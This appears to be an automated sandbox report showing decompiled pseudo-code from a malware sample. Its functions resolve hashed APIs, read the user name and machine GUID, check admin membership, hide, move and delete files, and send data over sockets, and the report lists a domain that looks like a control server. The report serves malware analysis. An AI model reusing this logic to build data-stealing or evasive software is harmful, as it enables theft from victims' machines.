                  0x00412e4f
                  0x00412e7e
                  0x00412e8a
                  0x00412e8f
                  0x00412e51
                  0x00412e59
                  0x00412e67
                  0x00412e6d
                  0x00412e72
                  0x00412e72
                  0x00412e9e
                  0x00412eaf
                  0x00412eb4
                  0x00412ec0
                  0x00412ece
                  0x00412edc
                  0x00412eea
                  0x00412ef8
                  0x00412f0f
                  0x00412f14
                  0x00412f14
                  0x00412f17
                  0x00412f1d
                  0x00412f1f
                  0x00000000
                  0x00412f1f
                  0x00412f74

                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                    • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                    • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$CreateFreeProcessThread_wmemset
                  • String ID: ckav.ru
                  • API String ID: 2915393847-2696028687
                  • Opcode ID: 4ffb2324b5e636bb84e4ca8419d7c53fd816c072200ffb04ee88a3e798f37901
                  • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                  • Opcode Fuzzy Hash: 4ffb2324b5e636bb84e4ca8419d7c53fd816c072200ffb04ee88a3e798f37901
                  • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                  0x00406340
                  0x00406345
                  0x00406373
                  0x00406373
                  0x00406347
                  0x0040634f
                  0x00406354
                  0x00406357
                  0x0040635c
                  0x00406366
                  0x0040636d
                  0x00000000
                  0x00406368
                  0x00406368
                  0x00406368
                  0x00406366
                  0x0040637a

                  APIs
                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                  • _wmemset.LIBCMT ref: 0040634F
                    • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser_wmemset
                  • String ID: CA
                  • API String ID: 2078537776-1052703068
                  • Opcode ID: d1183c44919910d3cae12003b163887c376787e916a8fa752fd5829d22d9d7d2
                  • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                  • Opcode Fuzzy Hash: d1183c44919910d3cae12003b163887c376787e916a8fa752fd5829d22d9d7d2
                  • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                  0x00406094
                  0x004060a8
                  0x004060ab

                  APIs
                  • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationToken
                  • String ID: IDA
                  • API String ID: 4114910276-365204570
                  • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                  • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                  • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                  • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                  0x00402c10
                  0x00402c15
                  0x00402c1b
                  0x00402c1e

                  APIs
                  • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc
                  • String ID: s1@
                  • API String ID: 190572456-427247929
                  • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                  • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                  • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                  • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                  0x00404a56
                  0x00404a65
                  0x00404a6a
                  0x00404ad1
                  0x00404ad1
                  0x00404a6c
                  0x00404a71
                  0x00404a79
                  0x00404a85
                  0x00404a9a
                  0x00404a9e
                  0x00404acb
                  0x00000000
                  0x00404aa0
                  0x00404aac
                  0x00404abc
                  0x00404ac1
                  0x00404ac6
                  0x00404ac6
                  0x00404a9e
                  0x00404ad9

                  APIs
                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                  • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                  • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateOpenProcessQueryValue
                  • String ID:
                  • API String ID: 1425999871-0
                  • Opcode ID: 1f0b624e087825ba4ba04b5966dc1e43d1c06488a2db27abe0d2a49db1d7511b
                  • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                  • Opcode Fuzzy Hash: 1f0b624e087825ba4ba04b5966dc1e43d1c06488a2db27abe0d2a49db1d7511b
                  • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402BAB Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}





                  0x00402bb2
                  0x00402bc0
                  0x00000000
                  0x00402bc0
                  0x00402bc7

                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                  • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$FreeProcess
                  • String ID:
                  • API String ID: 3859560861-0
                  • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                  • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                  • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                  • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                  Download Yara Rule
                  C-Code - Quality: 40%
                  			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                  0x004060c6
                  0x004060d5
                  0x004060d8
                  0x004060f4
                  0x004060f6
                  0x004060fb
                  0x0040610a
                  0x00406115
                  0x0040611c
                  0x0040611e
                  0x00406121
                  0x00000000
                  0x0040612a
                  0x0040612f

                  APIs
                  • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: CheckMembershipToken
                  • String ID:
                  • API String ID: 1351025785-0
                  • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                  • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                  • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                  • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                  0x00403c68
                  0x00403c70
                  0x00403c78
                  0x00403c82
                  0x00403c8b
                  0x00403c8f
                  0x00403c72
                  0x00403c76
                  0x00403c76

                  APIs
                  • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateDirectory
                  • String ID:
                  • API String ID: 4241100979-0
                  • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                  • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                  • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                  • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                  0x0040643c
                  0x00406445
                  0x00406454

                  APIs
                  • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoNativeSystem
                  • String ID:
                  • API String ID: 1721193555-0
                  • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                  • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                  • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                  • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                  0x00404eed
                  0x00404ef2
                  0x00404efd
                  0x00404efd
                  0x00404f07
                  0x00404f0e

                  APIs
                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: send
                  • String ID:
                  • API String ID: 2809346765-0
                  • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                  • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                  • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                  • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                  0x00403bdd
                  0x00403beb
                  0x00403bee

                  APIs
                  • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileMove
                  • String ID:
                  • API String ID: 3562171763-0
                  • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                  • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                  • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                  • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                  Download Yara Rule
                  APIs
                  • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Startup
                  • String ID:
                  • API String ID: 724789610-0
                  • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                  • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                  • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                  • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                  0x0040428a
                  0x00404297
                  0x0040429a

                  APIs
                  • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                  • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                  • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                  • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                  0x00404a27
                  0x00404a35
                  0x00404a38

                  APIs
                  • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                  • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                  • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                  • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                  0x00403c4d
                  0x00403c55
                  0x00403c58

                  APIs
                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                  • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                  • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                  • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                  0x00403c15
                  0x00403c1d
                  0x00403c20

                  APIs
                  • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                  • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                  • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                  • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                  0x00402c2c
                  0x00402c34
                  0x00402c37

                  APIs
                  • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
